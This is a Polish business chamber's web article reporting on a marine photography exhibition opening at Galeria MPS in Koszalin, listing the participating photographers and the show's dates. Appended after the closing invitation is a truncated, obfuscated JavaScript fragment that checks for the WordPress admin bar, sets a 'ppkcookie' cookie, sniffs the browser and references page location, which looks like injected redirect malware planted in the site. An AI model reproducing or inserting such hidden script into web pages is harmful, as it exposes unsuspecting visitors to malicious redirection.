Fotografia marynistyczna w Galerii MPS – relacja z wernisażu | Północna Izba Gospodarcza w Koszalinie

W piątek, 11-ego października w Galerii MPS w Koszalinie, odbyła się po raz czternasty wernisaż prac artystów z naszego regonu. Tym razem przedstawiono dwadzieścia osiem fotografii, zrobionych przez dwanaściorga artystów z Koszalińskiego Towarzystwa Fotograficznego „Bałtyk” – Marek Jóźków, Ewa Maliszewska, Sabina Marcinkowska, Tomasz Mikoluk, Krzysztof Miłosz, Marcin Pawlak, Bogusław Pasiński, Maria Pelc, Dariusz Pellowski, Agnieszka Stępniewska, Michał Szulc i Hubert Wyszyńsk. Fotografia to ich pasja. Robią zdjęcia wszystkim i wszystkiemu. Obserwują się nawzajem, uczą się od siebie, ale też od profesjonalistów. Każda rada jest dla nich cenna. Efekty ich pracy można podziwiać na wielu wystawach, tym razem w MPS International.

Otwarcie wystawy uświetnił Pan Wal Jarosz wykonując dwie szanty.

Galeria MPS jest jednym z zadań realizowanych przez spółkę w ramach społecznej odpowiedzialności biznesu. Dzięki niej codziennie 350 pracowników ma kontakt ze sztuką i to różnymi jej dziedzinami – od malarstwa przez fotografię po rzeźbę.

Wystawę w Galerii MPS można oglądać do 10 stycznia 2020 roku.

Serdecznie zapraszamy! 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m